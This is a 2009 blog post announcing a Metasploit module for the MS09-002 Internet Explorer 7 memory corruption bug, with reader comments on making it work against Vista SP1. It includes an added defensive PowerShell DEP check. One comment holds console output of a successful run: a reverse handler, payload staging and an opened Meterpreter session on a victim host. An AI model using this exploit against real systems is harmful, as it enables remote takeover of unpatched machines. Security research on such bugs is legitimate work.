Friday, February 20, 2009

MS09_002 Memory Corruption Update

CG just pushed the code to the Metasploit trunk so go run 'svn update' and enjoy. Any feedback would be good. I'll write up a little something on it and how the vuln is triggered too when I get a chance.

9 comments:

  1. Thanks for the heads up !

    Wondering, is this exploit only possible on an SP0 version of Vista, or could it work on SP1 too? (Considering the ie7 fix hasn't been applied yet...)

    ReplyDelete
  2. I did not have a Vista SP1 image to test it on but try it. The ret used (0x0C..) should be the same. Does sp1 enable opt-out mode for DEP by default? That would include IE7 then I think and that will break the sploit.

    Let me know how it goes.

    ReplyDelete
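The question in the reply above turns on whether IE7 is running with DEP on the target. The following is an added check, not code from the post or from the Metasploit module: it reports the system DEP policy from WMI and then asks the kernel whether each running 32-bit iexplore process actually has DEP enabled. It assumes Vista SP1 or later (GetProcessDEPPolicy does not exist on Vista RTM or XP SP2) and PowerShell 2.0 or later for Add-Type.

```powershell
# Added example: report the boot-level DEP policy and the per-process DEP state of IE7.
# Assumes Vista SP1+ (GetProcessDEPPolicy is absent on Vista RTM) and PowerShell 2.0+.
$policyNames = @{ 0 = 'AlwaysOff'; 1 = 'AlwaysOn'; 2 = 'OptIn'; 3 = 'OptOut' }

# Win32_OperatingSystem exposes the boot NX setting (bcdedit "nx") as
# DataExecutionPrevention_SupportPolicy: 0 AlwaysOff, 1 AlwaysOn, 2 OptIn, 3 OptOut.
$os  = Get-WmiObject -Class Win32_OperatingSystem
$sys = [int]$os.DataExecutionPrevention_SupportPolicy
"System DEP policy: $sys ($($policyNames[$sys]))"

# GetProcessDEPPolicy returns the per-process setting. It is only meaningful for
# 32-bit processes; 64-bit processes always run with DEP and the call fails for them.
Add-Type -Namespace Dep -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetProcessDEPPolicy(IntPtr hProcess, out uint flags, out bool permanent);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr h);
'@

$PROCESS_QUERY_INFORMATION = [uint32]0x0400   # access right needed by GetProcessDEPPolicy
$PROCESS_DEP_ENABLE        = [uint32]0x1      # bit set in flags when DEP is on for the process

foreach ($p in Get-Process -Name iexplore -ErrorAction SilentlyContinue) {
    $h = [Dep.Native]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $p.Id)
    if ($h -eq [IntPtr]::Zero) {
        "PID $($p.Id): cannot open process (run elevated?)"
        continue
    }
    $flags = [uint32]0
    $perm  = $false
    if ([Dep.Native]::GetProcessDEPPolicy($h, [ref]$flags, [ref]$perm)) {
        $state = if ($flags -band $PROCESS_DEP_ENABLE) { 'enabled' } else { 'disabled' }
        "PID $($p.Id): DEP $state (permanent=$perm)"
    } else {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        "PID $($p.Id): GetProcessDEPPolicy failed (Win32 error $err)"
    }
    [void][Dep.Native]::CloseHandle($h)
}
```

If the system policy is OptOut or AlwaysOn and the iexplore processes report DEP enabled, a return-into-heap technique like the one the module relies on is blocked by hardware NX; under OptIn, IE7 is not covered unless it opted in itself.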
  3. Building up the Vista sp1 image as we speak. I'll get back to you asap.

    ReplyDelete
  4. Building up the Vista sp1 image as we speak. I'll get back to you asap.

    Hmmm... just tried it, does not seem to work on a test computer running SP1... doing further testing as I don't know if it has the ie7 fix installed.

    ReplyDelete
  5. oddly, mine and the committed module look the same?

    With some slight modifications to the heap code, exploitation on IE7/Vista SP1
    is possible.

    msf exploit(ms09_002_deleteobject) > rexploit
    [*] Exploit running as background job.
    msf exploit(ms09_002_deleteobject) >
    [*] Handler binding to LHOST 172.10.1.103
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:8080/vistasp1
    [*] Local IP: http://172.10.1.103:8080/vistasp1
    [*] Server started.
    [*] Target is Windows Vista
    [*] Sending Internet Explorer 7 Uninitialized Memory Corruption Overflow to 172.10.1.105:49277...
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 1 opened (172.10.1.103:65535 -> 172.10.1.105:49278)

    msf exploit(ms09_002_deleteobject) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > sysinfo
    Computer: DA-RIZZLE
    OS : Windows 2000 (Build 6001, Service Pack 1).
    meterpreter >

    ReplyDelete
  6. well overwrite that shizzle with the SP1 version, I'm sure everyone won't mind :-)

    ReplyDelete
  7. Oh yeah, that would be nice, being able to play with sp1 too ! Please update the exploit to support SP1 !

    ReplyDelete
  8. msf exploit(ms09_002_memory_corruption) > exploit
    [*] Exploit running as background job.
    msf exploit(ms09_002_memory_corruption) >
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [-] Exploit failed: Permission denied - bind(2)

    where's the prob? help!

    ReplyDelete
  9. solved my own prob, thanks!

    ReplyDelete